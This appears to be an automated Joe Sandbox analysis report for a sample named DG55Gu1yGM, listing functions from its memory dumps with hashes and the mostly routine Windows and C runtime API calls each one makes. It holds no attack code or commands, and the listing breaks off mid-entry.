                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                        • String ID: advapi32.dll
                                                                                                                                                                                                                                        • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                        • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                        • Instruction ID: cc09fa6a7055fca5e834df0d9c1b68eaec85b71a9b9486a4470bc088614157cc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF217FB5944710FFE7117FB49C08A5ABBADEF05B16F104A2AF555E3600CB7C94418FA4
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0213F228,00000004,02137D87,00000004,02138069), ref: 0213EEF9
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,0213F228,00000004,02137D87,00000004,02138069,?,02138799,?,00000008,0213800D,00000000,?,?,00000000,?), ref: 0213EF05
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(advapi32.dll,?,0213F228,00000004,02137D87,00000004,02138069,?,02138799,?,00000008,0213800D,00000000,?,?,00000000), ref: 0213EF15
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00447430), ref: 0213EF2B
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF41
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF58
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF6F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF86
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF9D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                        • String ID: advapi32.dll
                                                                                                                                                                                                                                        • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                        • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                        • Instruction ID: 8e894119037cb72a9466862d31b0ada3729a9ad3d0400ce45cdcd28c94560d05
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E218EB5944710FFE7117FA49C08A5ABBEDEF05B16F104A2AF595E3600CB7C94418BA8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0213670B), ref: 021324B6
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021324C4
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021324D2
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0213670B), ref: 02132500
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02132507
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,0213670B), ref: 02132522
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,0213670B), ref: 0213252E
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02132544
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02132552
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                        • String ID: kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                        • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                        • Instruction ID: f8e48c907d24b75a175b206222a804027a34ff00a9a99c912bda4accb47bc1bd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0611A5769403117FE7167B746C59AAB7BAE9E06B137200536FC01E3191EF78DA008AAD
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                                                                                                                                                                                                          • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                                                                                                                                                                                                        • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                                                                                                                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                                                                                                                                                                                                        • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                                                                                                                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                        • String ID: pContext$switchState
                                                                                                                                                                                                                                        • API String ID: 3151764488-2660820399
                                                                                                                                                                                                                                        • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                        • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                                                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                                                                                                                                                                                                        • SafeRWList.LIBCONCRT ref: 00419798
                                                                                                                                                                                                                                          • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                                                                                                                                                                                                          • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                                                                                                                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 004197B9
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                        • String ID: eventObject
                                                                                                                                                                                                                                        • API String ID: 1999291547-1680012138
                                                                                                                                                                                                                                        • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                        • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02140C36
                                                                                                                                                                                                                                        • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02140C9D
                                                                                                                                                                                                                                        • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02140CBA
                                                                                                                                                                                                                                        • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02140D20
                                                                                                                                                                                                                                        • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02140D35
                                                                                                                                                                                                                                        • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02140D47
                                                                                                                                                                                                                                        • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02140D75
                                                                                                                                                                                                                                        • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02140D80
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02140DAC
                                                                                                                                                                                                                                        • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02140DBC
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3720063390-0
                                                                                                                                                                                                                                        • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                        • Instruction ID: a8ac6abef3c01d4486ce64037b120569f6e2354820833050a9f04b1a60a15706
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1741D230A84248DFCF19FFA5C4547ED77A7AF05304F1400A9D90E5B282CF369A49CB65
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 02152061
                                                                                                                                                                                                                                          • Part of subcall function 021536D1: HeapFree.KERNEL32(00000000,00000000,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?), ref: 021536E7
                                                                                                                                                                                                                                          • Part of subcall function 021536D1: GetLastError.KERNEL32(?,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?,?), ref: 021536F9
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215206D
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 02152078
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 02152083
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215208E
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 02152099
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 021520A4
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 021520AF
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 021520BA
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 021520C8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                        • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                        • Instruction ID: 6c609239823de5438c0a6893d63afbaec13f49fb5edb18a0f8d2d63355340e67
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22116076640118FFCB41EF94C845DD93BA6EF04390B5184E9BE288F221DB71EBA09F80
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431DFA
                                                                                                                                                                                                                                          • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                          • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431E06
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431E11
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431E1C
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431E27
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431E32
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431E3D
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431E48
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431E53
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431E61
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                        • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                        • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __cftoe
                                                                                                                                                                                                                                        • String ID: F(@$F(@
                                                                                                                                                                                                                                        • API String ID: 4189289331-2038261262
                                                                                                                                                                                                                                        • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                        • Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DecodePointer
                                                                                                                                                                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                        • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                        • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                                                                                                                                                        • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
                                                                                                                                                                                                                                        • Instruction ID: 57f3f83d385dabd51e1ea2a1b20021acd865679b4994473eaaca4ee728b41167
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9C1C070E84259EFDB16DFA8C840BAEBBB1AF09344F0441D9E875AB292C7349941CB61
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                        • String ID: fB$csm
                                                                                                                                                                                                                                        • API String ID: 1170836740-1586063737
                                                                                                                                                                                                                                        • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                        • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
                                                                                                                                                                                                                                        • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
                                                                                                                                                                                                                                        • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                                                                                                                                                                                                        • PMDtoOffset.LIBCMT ref: 00428D4F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                        • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                        • API String ID: 1467055271-2956939130
                                                                                                                                                                                                                                        • Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                                                                                                                                                        • Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 00405596
                                                                                                                                                                                                                                          • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                          • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                        • String ID: HaV
                                                                                                                                                                                                                                        • API String ID: 2243866535-2133240653
                                                                                                                                                                                                                                        • Opcode ID: 77bb5cf698310b8ba390bd61355b52a0ac70b2f21dca2487d2fd28bc22ac2b2d
                                                                                                                                                                                                                                        • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77bb5cf698310b8ba390bd61355b52a0ac70b2f21dca2487d2fd28bc22ac2b2d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • atomic_compare_exchange.LIBCONCRT ref: 0213C6DC
                                                                                                                                                                                                                                        • atomic_compare_exchange.LIBCONCRT ref: 0213C700
                                                                                                                                                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 0213C711
                                                                                                                                                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 0213C71F
                                                                                                                                                                                                                                          • Part of subcall function 02121370: __Mtx_unlock.LIBCPMT ref: 02121377
                                                                                                                                                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 0213C72F
                                                                                                                                                                                                                                          • Part of subcall function 0213C3EF: __Cnd_broadcast.LIBCPMT ref: 0213C3F6
                                                                                                                                                                                                                                        • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0213C73D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                                                                                                                                                        • String ID: t#D
                                                                                                                                                                                                                                        • API String ID: 4258476935-1671555958
                                                                                                                                                                                                                                        • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                        • Instruction ID: 14effb6c144d1dffdaa6e21f5408c066cd4254dcc5133b9846a3fe565ec13c71
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E501F772980605AFCB12F770CD89B9EB36BBF04310F140151E804A7680EB78AB158FD2
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 004321C6
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 004322AB
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 0043231B
                                                                                                                                                                                                                                          • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00432324
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00432349
                                                                                                                                                                                                                                        Memory Dump Source
